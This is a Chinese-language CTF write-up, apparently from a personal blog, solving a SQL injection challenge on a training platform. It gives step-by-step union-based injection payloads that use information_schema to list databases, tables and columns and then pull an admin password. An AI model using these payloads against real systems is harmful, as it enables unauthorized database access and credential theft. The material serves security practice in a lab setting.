CTFweb笔记

封神台一道sql注入题

传送门

判断注入点

id=1'

页面回显异常说明参数带入数据库查询

输入

id=1 and 1=1

页面回显正常

输入

id=1 and 1=2

页面回显错误

判断此页面存在注入点

判断字段数

id=1 order by 1  回显正常
id=1 order by 2  回显正常
id=1 order by 3  回显异常

此网页字段数为2

查询当前数据库的名称

id = 1 and 1=2 union select 1,database()

查询版本号

id=1 and 1=2 union select 1,version()

Mysql在5.0以上版本加入了 information_schema 这个系统自带库 其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等
information_schema.tables 存放表名和库名的对应
information_schema.columns 存放字段名和表名的对应

查询所有库名

id=1 and 1=2 union select 1,group_concat(schema_name) from information_schema.schemata

在mysql中，默认information_schema总库，其中包含所有的库名，表名，字段名…
schema_name是库名，information_schema.schemata是总库里的所有库。
这段的意思是从information_schema.schemata总库的所有库中列出所有的库名。

查询到三个数据库：information_schema,maoshe,test

查询表

id=1 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema='maoshe'

table_name是表名，information_schema.tables是总库里的所有表。
这段意思是从information_schema.tables总库的所有表中列出在maoshe库里的所有表名。

查询字段名

id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_schema='maoshe' and table_name='admin'

column_name是字段名， information_schema.columns 是总库里的所有字段。
这段意思是从information_schema.columns总库里的所有字段中列出在maoshe库里且在admin表里的所有字段名。

查询到三个字段名 我们需要获得密码所以查询password字段

id=1 and 1=2 union select 1,password from admin

得到管理员密码 hellohack 验证一下

ps:验证的时候注意不要把空格也复制进去

---

转载请注明来源，欢迎对文章中的引用来源进行考证，欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论，也可以邮件至 1012482327@qq.com